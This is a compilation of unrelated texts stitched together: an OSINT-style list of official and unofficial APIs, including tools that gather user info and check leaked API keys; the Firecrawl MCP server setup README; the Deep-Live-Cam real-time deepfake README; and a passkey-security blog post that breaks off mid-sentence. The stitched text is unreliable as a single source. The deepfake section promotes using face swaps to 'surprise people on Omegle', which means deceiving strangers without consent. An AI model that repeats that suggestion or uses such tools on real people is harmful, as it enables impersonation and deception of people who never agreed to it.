YouTube Data API | https://developers.google.com/youtube/v3 | ||
https://www.reddit.com/dev/api/ | |||
Vkontakte | https://vk.com/dev/methods | ||
Twitter API | https://developer.twitter.com/en | ||
Linkedin API | https://docs.microsoft.com/en-us/linkedin/ | ||
All Facebook and Instagram API | https://developers.facebook.com/docs/ | ||
Whatsapp Business API | https://www.whatsapp.com/business/api | ||
Telegram and Telegram Bot API | https://core.telegram.org | ||
Weibo API | https://open.weibo.com/wiki/API文档/en | ||
https://dev.xing.com/partners/job_integration/api_docs | |||
Viber | https://developers.viber.com/docs/api/rest-bot-api/ | ||
Discord | https://discord.com/developers/docs | ||
Odnoklassniki | https://ok.ru/apiok | ||
Blogger | https://developers.google.com/blogger/ | The Blogger APIs allows client applications to view and update Blogger content | FREE |
Disqus | https://disqus.com/api/docs/auth/ | Communicate with Disqus data | FREE |
Foursquare | https://developer.foursquare.com/ | Interact with Foursquare users and places (geolocation-based checkins, photos, tips, events, etc) | FREE |
HackerNews | https://github.com/HackerNews/API | Social news for CS and entrepreneurship | FREE |
Kakao | https://developers.kakao.com/ | Kakao Login, Share on KakaoTalk, Social Plugins and more | FREE |
Line | https://developers.line.biz/ | Line Login, Share on Line, Social Plugins and more | FREE |
TikTok | https://developers.tiktok.com/doc/login-kit-web | Fetches user info and user's video posts on TikTok platform | FREE |
Tumblr | https://www.tumblr.com/docs/en/api/v2 | Read and write Tumblr Data | FREE |
!WARNING Use with caution! Accounts may be blocked permanently for using unofficial APIs.
Name | Link | Description | Price |
---|---|---|---|
TikTok | https://github.com/davidteather/TikTok-Api | The Unofficial TikTok API Wrapper In Python | FREE |
Google Trends | https://github.com/suryasev/unofficial-google-trends-api | Unofficial Google Trends API | FREE |
YouTube Music | https://github.com/sigma67/ytmusicapi | Unofficial APi for YouTube Music | FREE |
Duolingo | https://github.com/KartikTalwar/Duolingo | Duolingo unofficial API (can gather info about users) | FREE |
Steam. | https://github.com/smiley/steamapi | An unofficial object-oriented Python library for accessing the Steam Web API. | FREE |
https://github.com/ping/instagram_private_api | Instagram Private API | FREE | |
Discord | https://github.com/discordjs/discord.js | JavaScript library for interacting with the Discord API | FREE |
Zhihu | https://github.com/syaning/zhihu-api | FREE Unofficial API for Zhihu | FREE |
Quora | https://github.com/csu/quora-api | Unofficial API for Quora | FREE |
DnsDumbster | https://github.com/PaulSec/API-dnsdumpster.com | (Unofficial) Python API for DnsDumbster | FREE |
PornHub | https://github.com/sskender/pornhub-api | Unofficial API for PornHub in Python | FREE |
Skype | https://github.com/ShyykoSerhiy/skyweb | Unofficial Skype API for nodejs via 'Skype (HTTP)' protocol. | FREE |
Google Search | https://github.com/aviaryan/python-gsearch | Google Search unofficial API for Python with no external dependencies | FREE |
Airbnb | https://github.com/nderkach/airbnb-python | Python wrapper around the Airbnb API (unofficial) | FREE |
Medium | https://github.com/enginebai/PyMedium | Unofficial Medium Python Flask API and SDK | FREE |
https://github.com/davidyen1124/Facebot | Powerful unofficial Facebook API | FREE | |
https://github.com/tomquirk/linkedin-api | Unofficial Linkedin API for Python | FREE | |
Y2mate | https://github.com/Simatwa/y2mate-api | Unofficial Y2mate API for Python | FREE |
Livescore | https://github.com/Simatwa/livescore-api | Unofficial Livescore API for Python | FREE |
Name | Link | Description | Price |
---|---|---|---|
Google Custom Search JSON API | https://developers.google.com/custom-search/v1/overview | Search in Google | 100 requests FREE |
Serpstack | https://serpstack.com/ | Google search results to JSON | FREE |
Serpapi | https://serpapi.com | Google, Baidu, Yandex, Yahoo, DuckDuckGo, Bint and many others search results | $50/5000 searches/month |
Bing Web Search API | https://www.microsoft.com/en-us/bing/apis/bing-web-search-api | Search in Bing (+instant answers and location) | 1000 transactions per month FREE |
WolframAlpha API | https://products.wolframalpha.com/api/pricing/ | Short answers, conversations, calculators and many more | from $25 per 1000 queries |
DuckDuckgo Instant Answers API | https://duckduckgo.com/api | An API for some of our Instant Answers, not for full search results. | FREE |
| Memex Marginalia | https://memex.marginalia.nu/projects/edge/api.gmi | An API for new privacy search engine | FREE |
Name | Link | Description | Price |
---|---|---|---|
MediaStack | https://mediastack.com/ | News articles search results in JSON | 500 requests/month FREE |
Name | Link | Description | Price |
---|---|---|---|
Darksearch.io | https://darksearch.io/apidoc | search by websites in .onion zone | FREE |
Onion Lookup | https://onion.ail-project.org/ | onion-lookup is a service for checking the existence of Tor hidden services and retrieving their associated metadata. onion-lookup relies on an private AIL instance to obtain the metadata | FREE |
Name | Link | Description | Price |
---|---|---|---|
Jackett | https://github.com/Jackett/Jackett | API for automate searching in different torrent trackers | FREE |
Torrents API PY | https://github.com/Jackett/Jackett | Unofficial API for 1337x, Piratebay, Nyaasi, Torlock, Torrent Galaxy, Zooqle, Kickass, Bitsearch, MagnetDL,Libgen, YTS, Limetorrent, TorrentFunk, Glodls, Torre | FREE |
Torrent Search API | https://github.com/Jackett/Jackett | API for Torrent Search Engine with Extratorrents, Piratebay, and ISOhunt | 500 queries/day FREE |
Torrent search api | https://github.com/JimmyLaurent/torrent-search-api | Yet another node torrent scraper (supports iptorrents, torrentleech, torrent9, torrentz2, 1337x, thepiratebay, Yggtorrent, TorrentProject, Eztv, Yts, LimeTorrents) | FREE |
Torrentinim | https://github.com/sergiotapia/torrentinim | Very low memory-footprint, self hosted API-only torrent search engine. Sonarr + Radarr Compatible, native support for Linux, Mac and Windows. | FREE |
Name | Link | Description | Price |
---|---|---|---|
National Vulnerability Database CVE Search API | https://nvd.nist.gov/developers/vulnerabilities | Get basic information about CVE and CVE history | FREE |
OpenCVE API | https://docs.opencve.io/api/cve/ | Get basic information about CVE | FREE |
CVEDetails API | https://www.cvedetails.com/documentation/apis | Get basic information about CVE | partly FREE (?) |
CVESearch API | https://docs.cvesearch.com/ | Get basic information about CVE | by request |
KEVin API | https://kevin.gtfkd.com/ | API for accessing CISA's Known Exploited Vulnerabilities Catalog (KEV) and CVE Data | FREE |
Vulners.com API | https://vulners.com | Get basic information about CVE | FREE for personal use |
Name | Link | Description | Price |
---|---|---|---|
Aviation Stack | https://aviationstack.com | get information about flights, aircrafts and airlines | FREE |
OpenSky Network | https://opensky-network.org/apidoc/index.html | Free real-time ADS-B aviation data | FREE |
AviationAPI | https://docs.aviationapi.com/ | FAA Aeronautical Charts and Publications, Airport Information, and Airport Weather | FREE |
FachaAPI | https://api.facha.dev | Aircraft details and live positioning API | FREE |
Name | Link | Description | Price |
---|---|---|---|
Windy Webcams API | https://api.windy.com/webcams/docs | Get a list of available webcams for a country, city or geographical coordinates | FREE with limits or 9990 euro without limits |
## Regex
Name | Link | Description | Price |
---|---|---|---|
Autoregex | https://autoregex.notion.site/AutoRegex-API-Documentation-97256bad2c114a6db0c5822860214d3a | Convert English phrase to regular expression | from $3.49/month |
Name | Link |
---|---|
API Guessr (detect API by auth key or by token) | https://api-guesser.netlify.app/ |
REQBIN Online REST & SOAP API Testing Tool | https://reqbin.com |
ExtendClass Online REST Client | https://extendsclass.com/rest-client-online.html |
Codebeatify.org Online API Test | https://codebeautify.org/api-test |
SyncWith Google Sheet add-on. Link more than 1000 APIs with Spreadsheet | https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget |
Talend API Tester Google Chrome Extension | https://workspace.google.com/u/0/marketplace/app/syncwith_crypto_binance_coingecko_airbox/449644239211?hl=ru&pann=sheets_addon_widget |
Michael Bazzel APIs search tools | https://inteltechniques.com/tools/API.html |
Name | Link |
---|---|
Convert curl commands to Python, JavaScript, PHP, R, Go, C#, Ruby, Rust, Elixir, Java, MATLAB, Dart, CFML, Ansible URI or JSON | https://curlconverter.com |
Curl-to-PHP. Instantly convert curl commands to PHP code | https://incarnate.github.io/curl-to-php/ |
Curl to PHP online (Codebeatify) | https://codebeautify.org/curl-to-php-online |
Curl to JavaScript fetch | https://kigiri.github.io/fetch/ |
Curl to JavaScript fetch (Scrapingbee) | https://www.scrapingbee.com/curl-converter/javascript-fetch/ |
Curl to C# converter | https://curl.olsh.me |
Name | Link |
---|---|
Sheety. Create API frome GOOGLE SHEET | https://sheety.co/ |
Postman. Platform for creating your own API | https://www.postman.com |
Reetoo. Rest API Generator | https://retool.com/api-generator/ |
Beeceptor. Rest API mocking and intercepting in seconds (no coding). | https://beeceptor.com |
Name | Link |
---|---|
RapidAPI. Market your API for millions of developers | https://rapidapi.com/solution/api-provider/ |
Apilayer. API Marketplace | https://apilayer.com |
Name | Link | Description |
---|---|---|
Keyhacks | https://github.com/streaak/keyhacks | Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. |
All about APIKey | https://github.com/daffainfo/all-about-apikey | Detailed information about API key / OAuth token for different services (Description, Request, Response, Regex, Example) |
API Guessr | https://api-guesser.netlify.app/ | Enter API Key and and find out which service they belong to |
Name | Link | Description |
---|---|---|
APIDOG ApiHub | https://apidog.com/apihub/ | |
Rapid APIs collection | https://rapidapi.com/collections | |
API Ninjas | https://api-ninjas.com/api | |
APIs Guru | https://apis.guru/ | |
APIs List | https://apislist.com/ | |
API Context Directory | https://apicontext.com/api-directory/ | |
Any API | https://any-api.com/ | |
Public APIs Github repo | https://github.com/public-apis/public-apis |
If you don't know how to work with the REST API, I recommend you check out the Netlas API guide I wrote for Netlas.io.
There it is very brief and accessible to write how to automate requests in different programming languages (focus on Python and Bash) and process the resulting JSON data.
Thank you for following me! https://cybdetective.com
A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.
Big thanks to @vrknetha, @cawstudios for the initial implementation!
You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.
env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp
npm install -g firecrawl-mcp
Configuring Cursor 🖥️ Note: Requires Cursor version 0.45.6+ For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide
To configure Firecrawl MCP in Cursor v0.45.6
env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp
To configure Firecrawl MCP in Cursor v0.48.6
json { "mcpServers": { "firecrawl-mcp": { "command": "npx", "args": ["-y", "firecrawl-mcp"], "env": { "FIRECRAWL_API_KEY": "YOUR-API-KEY" } } } }
If you are using Windows and are running into issues, try
cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"
Replace your-api-key
with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys
After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.
Add this to your ./codeium/windsurf/model_config.json
:
{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY"
}
}
}
}
To install Firecrawl for Claude Desktop automatically via Smithery:
npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude
FIRECRAWL_API_KEY
: Your Firecrawl API keyFIRECRAWL_API_URL
FIRECRAWL_API_URL
(Optional): Custom API endpoint for self-hosted instanceshttps://firecrawl.your-domain.com
FIRECRAWL_RETRY_MAX_ATTEMPTS
: Maximum number of retry attempts (default: 3)FIRECRAWL_RETRY_INITIAL_DELAY
: Initial delay in milliseconds before first retry (default: 1000)FIRECRAWL_RETRY_MAX_DELAY
: Maximum delay in milliseconds between retries (default: 10000)FIRECRAWL_RETRY_BACKOFF_FACTOR
: Exponential backoff multiplier (default: 2)FIRECRAWL_CREDIT_WARNING_THRESHOLD
: Credit usage warning threshold (default: 1000)FIRECRAWL_CREDIT_CRITICAL_THRESHOLD
: Credit usage critical threshold (default: 100)For cloud API usage with custom retry and credit monitoring:
# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key
# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff
# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits
For self-hosted instance:
# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com
# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth
# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries
Add this to your claude_desktop_config.json
:
{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",
"FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
"FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
"FIRECRAWL_RETRY_MAX_DELAY": "30000",
"FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",
"FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
"FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
}
}
}
}
The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:
const CONFIG = {
retry: {
maxAttempts: 3, // Number of retry attempts for rate-limited requests
initialDelay: 1000, // Initial delay before first retry (in milliseconds)
maxDelay: 10000, // Maximum delay between retries (in milliseconds)
backoffFactor: 2, // Multiplier for exponential backoff
},
credit: {
warningThreshold: 1000, // Warn when credit usage reaches this level
criticalThreshold: 100, // Critical alert when credit usage reaches this level
},
};
These configurations control:
Retry Behavior
Automatically retries failed requests due to rate limits
Example: With default settings, retries will be attempted at:
Credit Usage Monitoring
The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:
firecrawl_scrape
)Scrape content from a single URL with advanced options.
{
"name": "firecrawl_scrape",
"arguments": {
"url": "https://example.com",
"formats": ["markdown"],
"onlyMainContent": true,
"waitFor": 1000,
"timeout": 30000,
"mobile": false,
"includeTags": ["article", "main"],
"excludeTags": ["nav", "footer"],
"skipTlsVerification": false
}
}
firecrawl_batch_scrape
)Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.
{
"name": "firecrawl_batch_scrape",
"arguments": {
"urls": ["https://example1.com", "https://example2.com"],
"options": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}
Response includes operation ID for status checking:
{
"content": [
{
"type": "text",
"text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
}
],
"isError": false
}
firecrawl_check_batch_status
)Check the status of a batch operation.
{
"name": "firecrawl_check_batch_status",
"arguments": {
"id": "batch_1"
}
}
firecrawl_search
)Search the web and optionally extract content from search results.
{
"name": "firecrawl_search",
"arguments": {
"query": "your search query",
"limit": 5,
"lang": "en",
"country": "us",
"scrapeOptions": {
"formats": ["markdown"],
"onlyMainContent": true
}
}
}
firecrawl_crawl
)Start an asynchronous crawl with advanced options.
{
"name": "firecrawl_crawl",
"arguments": {
"url": "https://example.com",
"maxDepth": 2,
"limit": 100,
"allowExternalLinks": false,
"deduplicateSimilarURLs": true
}
}
firecrawl_extract
)Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.
{
"name": "firecrawl_extract",
"arguments": {
"urls": ["https://example.com/page1", "https://example.com/page2"],
"prompt": "Extract product information including name, price, and description",
"systemPrompt": "You are a helpful assistant that extracts product information",
"schema": {
"type": "object",
"properties": {
"name": { "type": "string" },
"price": { "type": "number" },
"description": { "type": "string" }
},
"required": ["name", "price"]
},
"allowExternalLinks": false,
"enableWebSearch": false,
"includeSubdomains": false
}
}
Example response:
{
"content": [
{
"type": "text",
"text": {
"name": "Example Product",
"price": 99.99,
"description": "This is an example product description"
}
}
],
"isError": false
}
urls
: Array of URLs to extract information fromprompt
: Custom prompt for the LLM extractionsystemPrompt
: System prompt to guide the LLMschema
: JSON schema for structured data extractionallowExternalLinks
: Allow extraction from external linksenableWebSearch
: Enable web search for additional contextincludeSubdomains
: Include subdomains in extractionWhen using a self-hosted instance, the extraction will use your configured LLM. For cloud API, it uses Firecrawl's managed LLM service.
Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.
{
"name": "firecrawl_deep_research",
"arguments": {
"query": "how does carbon capture technology work?",
"maxDepth": 3,
"timeLimit": 120,
"maxUrls": 50
}
}
Arguments:
Returns:
Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.
{
"name": "firecrawl_generate_llmstxt",
"arguments": {
"url": "https://example.com",
"maxUrls": 20,
"showFullText": true
}
}
Arguments:
Returns:
The server includes comprehensive logging:
Example log messages:
[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...
The server provides robust error handling:
Example error response:
{
"content": [
{
"type": "text",
"text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
}
],
"isError": true
}
# Install dependencies
npm install
# Build
npm run build
# Run tests
npm test
npm test
MIT License - see LICENSE file for details
Real-time face swap and video deepfake with a single click and only a single image.
This deepfake software is designed to be a productive tool for the AI-generated media industry. It can assist artists in animating custom characters, creating engaging content, and even using models for clothing design.
We are aware of the potential for unethical applications and are committed to preventative measures. A built-in check prevents the program from processing inappropriate media (nudity, graphic content, sensitive material like war footage, etc.). We will continue to develop this project responsibly, adhering to the law and ethics. We may shut down the project or add watermarks if legally required.
Ethical Use: Users are expected to use this software responsibly and legally. If using a real person's face, obtain their consent and clearly label any output as a deepfake when sharing online.
Content Restrictions: The software includes built-in checks to prevent processing inappropriate media, such as nudity, graphic content, or sensitive material.
Legal Compliance: We adhere to all relevant laws and ethical guidelines. If legally required, we may shut down the project or add watermarks to the output.
User Responsibility: We are not responsible for end-user actions. Users must ensure their use of the software aligns with ethical standards and legal requirements.
By using this software, you agree to these terms and commit to using it in a manner that respects the rights and dignity of others.
Users are expected to use this software responsibly and legally. If using a real person's face, obtain their consent and clearly label any output as a deepfake when sharing online. We are not responsible for end-user actions.
1. Select a face 2. Select which camera to use 3. Press live!
Retain your original mouth for accurate movement using Mouth Mask
Use different faces on multiple subjects simultaneously
Watch movies with any face in real-time
Run Live shows and performances
Create Your Most Viral Meme Yet
Created using Many Faces feature in Deep-Live-Cam
Surprise people on Omegle
Please be aware that the installation requires technical skills and is not for beginners. Consider downloading the prebuilt version.
git clone https://github.com/hacksider/Deep-Live-Cam.git
cd Deep-Live-Cam
**3. Download the Models** 1. [GFPGANv1.4](https://huggingface.co/hacksider/deep-live-cam/resolve/main/GFPGANv1.4.pth) 2. [inswapper\_128\_fp16.onnx](https://huggingface.co/hacksider/deep-live-cam/resolve/main/inswapper_128_fp16.onnx) Place these files in the "**models**" folder. **4. Install Dependencies** We highly recommend using a `venv` to avoid issues. For Windows: python -m venv venv
venv\Scripts\activate
pip install -r requirements.txt
**For macOS:** Apple Silicon (M1/M2/M3) requires specific setup: # Install Python 3.10 (specific version is important)
brew install python@3.10
# Install tkinter package (required for the GUI)
brew install python-tk@3.10
# Create and activate virtual environment with Python 3.10
python3.10 -m venv venv
source venv/bin/activate
# Install dependencies
pip install -r requirements.txt
** In case something goes wrong and you need to reinstall the virtual environment ** # Deactivate the virtual environment
rm -rf venv
# Reinstall the virtual environment
python -m venv venv
source venv/bin/activate
# install the dependencies again
pip install -r requirements.txt
**Run:** If you don't have a GPU, you can run Deep-Live-Cam using `python run.py`. Note that initial execution will download models (~300MB). ### GPU Acceleration **CUDA Execution Provider (Nvidia)** 1. Install [CUDA Toolkit 11.8.0](https://developer.nvidia.com/cuda-11-8-0-download-archive) 2. Install dependencies: pip uninstall onnxruntime onnxruntime-gpu
pip install onnxruntime-gpu==1.16.3
3. Usage: python run.py --execution-provider cuda
**CoreML Execution Provider (Apple Silicon)** Apple Silicon (M1/M2/M3) specific installation: 1. Make sure you've completed the macOS setup above using Python 3.10. 2. Install dependencies: pip uninstall onnxruntime onnxruntime-silicon
pip install onnxruntime-silicon==1.13.1
3. Usage (important: specify Python 3.10): python3.10 run.py --execution-provider coreml
**Important Notes for macOS:** - You **must** use Python 3.10, not newer versions like 3.11 or 3.13 - Always run with `python3.10` command not just `python` if you have multiple Python versions installed - If you get error about `_tkinter` missing, reinstall the tkinter package: `brew reinstall python-tk@3.10` - If you get model loading errors, check that your models are in the correct folder - If you encounter conflicts with other Python versions, consider uninstalling them: ```bash # List all installed Python versions brew list | grep python # Uninstall conflicting versions if needed brew uninstall --ignore-dependencies python@3.11 python@3.13 # Keep only Python 3.10 brew cleanup ``` **CoreML Execution Provider (Apple Legacy)** 1. Install dependencies: pip uninstall onnxruntime onnxruntime-coreml
pip install onnxruntime-coreml==1.13.1
2. Usage: python run.py --execution-provider coreml
**DirectML Execution Provider (Windows)** 1. Install dependencies: pip uninstall onnxruntime onnxruntime-directml
pip install onnxruntime-directml==1.15.1
2. Usage: python run.py --execution-provider directml
**OpenVINO™ Execution Provider (Intel)** 1. Install dependencies: pip uninstall onnxruntime onnxruntime-openvino
pip install onnxruntime-openvino==1.15.0
2. Usage: python run.py --execution-provider openvino
1. Image/Video Mode
python run.py
.2. Webcam Mode
python run.py
.Check out these helpful guides to get the most out of Deep-Live-Cam:
Visit our official blog for more tips and tutorials.
options:
-h, --help show this help message and exit
-s SOURCE_PATH, --source SOURCE_PATH select a source image
-t TARGET_PATH, --target TARGET_PATH select a target image or video
-o OUTPUT_PATH, --output OUTPUT_PATH select output file or directory
--frame-processor FRAME_PROCESSOR [FRAME_PROCESSOR ...] frame processors (choices: face_swapper, face_enhancer, ...)
--keep-fps keep original fps
--keep-audio keep original audio
--keep-frames keep temporary frames
--many-faces process every face
--map-faces map source target faces
--mouth-mask mask the mouth region
--video-encoder {libx264,libx265,libvpx-vp9} adjust output video encoder
--video-quality [0-51] adjust output video quality
--live-mirror the live camera display as you see it in the front-facing camera frame
--live-resizable the live camera frame is resizable
--max-memory MAX_MEMORY maximum amount of RAM in GB
--execution-provider {cpu} [{cpu} ...] available execution provider (choices: cpu, ...)
--execution-threads EXECUTION_THREADS number of execution threads
-v, --version show program's version number and exit
Looking for a CLI mode? Using the -s/--source argument will make the run program in cli mode.
We are always open to criticism and are ready to improve, that's why we didn't cherry-pick anything.
Let me start by very simply explaining the problem we're trying to solve with passkeys. Imagine you're logging on to a website like this:
And, because you want to protect your account from being logged into by someone else who may obtain your username and password, you've turned on two-factor authentication (2FA). That means that even after entering the correct credentials in the screen above, you're now prompted to enter the six-digit code from your authenticator app:
There are a few different authenticator apps out there, but what they all have in common is that they display a one-time password (henceforth referred to as an OTP) with a countdown timer next to it:
By only being valid for a short period of time, if someone else obtains the OTP then they have a very short window in which it's valid. Besides, who can possibly obtain it from your authenticator app anyway?! Well... that's where the problem lies, and I demonstrated this just recently, not intentionally, but rather entirely by accident when I fell victim to a phishing attack. Here's how it worked:
The problem with OTPs from authenticator apps (or sent via SMS) is that they're phishable in that it's possible for someone to trick you into handing one over. What we need instead is a "phishing-resistant" paradigm, and that's precisely what passkeys are. Let's look at how to set them up, how to use them on websites and in mobile apps, and talk about what some of their shortcomings are.
We'll start by setting one up for WhatsApp given I got a friendly prompt from them to do this recently:
So, let's "Try it" and walk through the mechanics of what it means to setup a passkey. I'm using an iPhone, and this is the screen I'm first presented with:
A passkey is simply a digital file you store on your device. It has various cryptographic protections in the way it is created and then used to login, but that goes beyond the scope of what I want to explain to the audience in this blog post. Let's touch briefly on the three items WhatsApp describes above:
That last point can be very device-specific and very user-specific. Because I have an iPhone, WhatsApp is suggesting I save the passkey into my iCloud Keychain. If you have an Android, you're obviously going to see a different message that aligns to how Google syncs passkeys. Choosing one of these native options is your path of least resistance - a couple of clicks and you're done. However...
I have lots of other services I want to use passkeys on, and I want to authenticate to them both from my iPhone and my Windows PC. For example, I use LinkedIn across all my devices, so I don't want my passkey tied solely to my iPhone. (It's a bit clunky, but some services enable this by using the mobile device your passkey is on to scan a QR code displayed on a web page). And what if one day I switch from iPhone to Android? I'd like my passkeys to be more transferable, so I'm going to store them in my dedicated password manager, 1Password.
A quick side note: as you'll read in this post, passkeys do not necessarily replace passwords. Sometimes they can be used as a "single factor" (the only thing you use to login with), but they may also be used as a "second factor" with the first being your password. This is up to the service implementing them, and one of the criticisms of passkeys is that your experience with them will differ between websites.
We still need passwords, we still want them to be strong and unique, therefore we still need password managers. I've been using 1Password for 14 years now (full disclosure: they sponsor Have I Been Pwned, and often sponsor this blog too) and as well as storing passwords (and credit cards and passport info and secure notes and sharing it all with my family), they can also store passkeys. I have 1Password installed on my iPhone and set as the default app to autofill passwords and passkeys:
Because of this, I'm given the option to store my WhatsApp passkey directly there:
The obfuscated section is the last four digits of my phone number. Let's "Continue", and then 1Password pops up with a "Save" button:
Once saved, WhatsApp displays the passkey that is now saved against my account:
And because I saved it into 1Password that syncs across all my devices, I can jump over to the PC and see it there too.
And that's it, I now have a passkey for WhatsApp which can be used to log in. I picked this example as a starting point given the massive breadth of the platform and the fact I was literally just prompted to create a passkey (the very day my Mailchimp account was phished, ironically). Only thing is, I genuinely can't see how to log out of WhatsApp so I can then test using the passkey to login. Let's go and create another with a different service and see how that experience differs.
Let's pick another example, and we'll set this one up on my PC. I'm going to pick a service that contains some important personal information, which would be damaging if it were taken over. In this case, the service has also previously suffered a data breach themselves: LinkedIn.
I already had two-step verification enabled on LinkedIn, but as evidenced in my own phishing experience, this isn't always enough. (Note: the terms "two-step", "two-factor" and "multi-factor" do have subtle differences, but for the sake of simplicity, I'll treat them as interchangeable terms in this post.)
Onto passkeys, and you'll see similarities between LinkedIn's and WhatsApp's descriptions. An important difference, however, is LinkedIn's comment about not needing to remember complex passwords:
Let's jump into it and create that passkey, but just before we do, keep in mind that it's up to each and every different service to decide how they implement the workflow for creating passkeys. Just like how different services have different rules for password strength criteria, the same applies to the mechanics of passkey creation. LinkedIn begins by requiring my password again:
This is part of the verification process to ensure someone other than you (for example, someone who can sit down at your machine that's already logged into LinkedIn), can't add a new way of accessing your account. I'm then prompted for a 6-digit code:
Which has already been sent to my email address, thus verifying I am indeed the legitimate account holder:
As soon as I enter that code in the website, LinkedIn pushes the passkey to me, which 1Password then offers to save:
Again, your experience will differ based on which device and preferred method of storing passkeys you're using. But what will always be the same for LinkedIn is that you can then see the successfully created passkey on the website:
Now, let's see how it works by logging out of LinkedIn and then returning to the login page. Immediately, 1Password pops up and offers to sign me in with my passkey:
That's a one-click sign-in, and clicking the purple button immediately grants me access to my account. Not only will 1Password not let me enter the passkey into a phishing site, due to the technical implementation of the keys, it would be completely unusable even if it was submitted to a nefarious party. Let me emphasise something really significant about this process:
Passkeys are one of the few security constructs that make your life easier, rather than harder.
However, there's a problem: I still have a password on the account, and I can still log in with it. What this means is that LinkedIn has decided (and, again, this is one of those website-specific decisions), that a passkey merely represents a parallel means of logging in. It doesn't replace the password, nor can it be used as a second factor. Even after generating the passkey, only two options are available for that second factor:
The risk here is that you can still be tricked into entering your password into a phishing site, and per my Mailchimp example, your second factor (the OTP generated by your authenticator app) can then also be phished. This is not to say you shouldn't use a passkey on LinkedIn, but whilst you still have a password and phishable 2FA, you're still at risk of the same sort of attack that got me.
Let's try one more example, and this time, it's one that implements passkeys as a genuine second factor: Ubiquiti.
Ubiquiti is my favourite manufacturer of networking equipment, and logging onto their system gives you an enormous amount of visibility into my home network. When originally setting up that account many years ago, I enabled 2FA with an OTP and, as you now understand, ran the risk of it being phished. But just the other day I noticed passkey support and a few minutes later, my Ubiquiti account in 1Password looked like this:
I won't bother running through the setup process again because it's largely similar to WhatsApp and LinkedIn, but I will share just what it looks like to now login to that account, and it's awesome:
I intentionally left this running at real-time speed to show how fast the login process is with a password manager and passkey (I've blanked out some fields with personal info in them). That's about seven seconds from when I first interacted with the screen to when I was fully logged in with a strong password and second factor. Let me break that process down step by step:
Now, remember "the LinkedIn problem" where you were still stuck with phishable 2FA? Not so with Ubiquiti, who allowed me to completely delete the authenticator app:
But there's one more thing we can do here to strengthen everything up further, and that's to get rid of email authentication and replace it with something even stronger than a passkey: a U2F key.
Whilst passkeys themselves are considered non-phishable, what happens if the place you store that digital key gets compromised? Your iCloud Keychain, for example, or your 1Password account. If you configure and manage these services properly then the likelihood of that happening is extremely remote, but the possibility remains. Let's add something entirely different now, and that's a physical security key:
This is a YubiKey and you can you can store your digital passkey on it. It needs to be purchased and as of today, that's about a US$60 investment for a single key. YubiKeys are called "Universal 2 Factor" or U2F keys and the one above (that's a 5C NFC) can either plug into a device with USB-C or be held next to a phone with NFC (that's "near field communication", a short-range wireless technology that requires devices to be a few centimetres apart). YubiKeys aren't the only makers of U2F keys, but their name has become synonymous with the technology.
Back to Ubiquiti, and when I attempt to remove email authentication, the following prompt stops me dead in my tracks:
I don't want email authentication because that involves sending a code to my email address and, well, we all know what happens when we're relying on people to enter codes into login forms 🤔 So, let's now walk through the Ubiquiti process and add another passkey as a second factor:
But this time, when Chrome pops up and offers to save it in 1Password, I'm going to choose the little USB icon at the top of the prompt instead:
Windows then gives me a prompt to choose where I wish to save the passkey, which is where I choose the security key I've already inserted into my PC:
Each time you begin interacting with a U2F key, it requires a little tap:
And a moment later, my digital passkey has been saved to my physical U2F key:
Just as you can save your passkey to Apple's iCloud Keychain or in 1Password and sync it across your devices, you can also save it to a physical key. And that's precisely what I've now done - saved one Ubiquiti passkey to 1Password and one to my YubiKey. Which means I can now go and remove email authentication, but it does carry a risk:
